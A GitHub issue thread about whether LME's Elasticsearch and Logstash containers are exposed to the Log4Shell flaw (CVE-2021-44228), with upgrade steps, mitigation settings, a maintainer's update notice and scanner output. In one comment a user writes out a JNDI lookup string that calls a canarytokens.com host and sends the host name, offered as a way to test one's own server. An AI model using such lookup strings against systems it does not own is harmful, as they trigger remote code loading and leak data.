CVE-2021-44228
ctmx opened this issue · comments
Do we know whether elasticsearch and logstash in lme is vulnerable to CVE-2021-44228?
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
I found this article https://discuss.elastic.co/t/zero-day-exploit-in-log4j2-which-is-part-of-elasticsearch/291439/12
I am rubbish in Docker so I am just trying to work out how I can see these settings.
I have managed to upgrade the elasticsearch, logstash and kibana to 7.16.0 so I will now wait for the update the 7.16.1 which is said to bring in log4j version 2.15
@brummybird how did you do the update?
Hi imran196, I don't know if this is approved by NCSC and I cannot be held responsible if something doesn't work (so make a backup etc) but I created a snapshot of my VM. I then ssh in and edited the file /opt/lme/Chapter 3 Files/docker-compose-stack.yml
My file contained the following lines:
line 8 and 9:
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:7.13.3
line 53 and 54
kibana:
image: docker.elastic.co/kibana/kibana:7.13.3
line 75 and 76:
logstash:
image: docker.elastic.co/logstash/logstash:7.13.3
I changed the version on all of these lines to 7.16.1 ie:
logstash:
image: docker.elastic.co/logstash/logstash:7.16.1
Saved the file and then from /opt/lme command line I ran "./lme_update.sh upgrade" (without the quotes)
Once completed I rebooted and then from ssh I ran docker ps to watch the container images start. Once everything was started I logged in to the web browser and was able to see my version is now 7.16.1
I need to test to see if log4j is now at version 2.15 so any assistance on this is much appreciated as my docker skills are limited.
Cheers!!
Thanks a lot for your help @brummybird!
As I understand the changelogs and the Security Announcement the Version of log4j is still not 2.1.5 due compatibility issues.
But they removed the vulnerable class.
Users may upgrade to Elasticsearch 7.16.1 53 or 6.8.21 31, which were released on December 13, 2021. These releases do not upgrade the Log4j package, but mitigate the vulnerability by setting the JVM option 2.4k -Dlog4j2.formatMsgNoLookups=true and remove the vulnerable JndiLookup class from the Log4j package.
So I think it isn't necessary to update to 7.16.1. Following the fix at the Security Announcement should do the same.
Thanks @brummybird that worked for me, much appreciated.
Also Thanks @LeitLei for the mitigation, is there any way I can confirm if that value is set to true? where would it be located?
been a head scratcher all morning!
Untested:
sudo docker ps
sudo docker run -it elasticsearch:7.XX.X bash
vi config/jvm.options
Normally there should now be a line like Dlog4j2.formatMsgNoLookups=true
EDIT:
You can simply test it with a Service like Canary Tokens
I tested it after update to 7.16.1 (with help from here):
Register at canarytokens.com
Console at LME-Server:
sudo docker ps
sudo docker exec -it lme_logstash.1.XXX /bin/bash (Replace the XX with your ID from the first step)
echo '${jndi:ldap://x${hostName}.XXX.canarytokens.com/a}' | logstash -e 'filter { json { source => "message" }}' (Replace the XX with your ID from canarytokens)
exit
Now all is fine
Dont forget to update your rules!
Hi all, as you are aware there is an unauthenticated remote code execution vulnerability (CVE-2021-44228) which affects multiple versions of the Apache Log4j 2 library.
We are currently investigating how this applies to LME and will be aiming to deploy an update based on Elastic’s 7.16.1 release as a matter of priority, which should resolve the issue discussed here.
In the meantime, the latest guidance from Elastic can be found here, which indicates that the docker containers currently in-use within LME are not vulnerable to remote code execution. We will continue to monitor this as we get information from Elastic and will update this if required, but the aim is to deploy the fix in as short a space of time as possible. If you have automatic updates enabled you should receive this fix automatically as soon as we push it out to GitHub, but if this is not enabled you may need to apply this manually once we make it available.
Additionally for wider guidance and advice on this vulnerability by the NCSC, please see the information provided here:
https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
This should now be addressed in #115 which brings LME up to date with the latest available version of Elastic.
If you have the automatic updates option on then you should receive this automatically once the update calls triggers for you, but if you don't have this or you would like to receive the update sooner than simply calling the update function yourself should achieve this:
cd /opt/lme/Chapter\ 3\ Files/
sudo ./deploy.sh update
If you are reading this and are on an older version of LME (v0.3 or lower) than please follow the standard upgrade instructions here to move to LME v0.4, which should upgrade you from Elastic v7.8 which was in-use within LME v0.3.
Hi, I have updated to 7.16.1 and scanned the server using nessus and am finding the below 2 installs still, also is LME doing to be updated to use Log4j 2.16?
/var/lib/docker/overlay2/f003ef64397a724354a7c16e9d3b689c1fd687c24f84ba4d5e5cb2778060ef7e/diff/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.12.1.jar
Installed version : 2.12.1
Fixed version : 2.15.0
Path : /var/lib/docker/overlay2/c9daf47c2972fe4f9fecdd778912573999dd68573383f11fe1b8a598fac70fea/diff/usr/share/elasticsearch/lib/log4j-core-2.11.1.jar
Installed version : 2.11.1
Fixed version : 2.15.0
Thanks in advance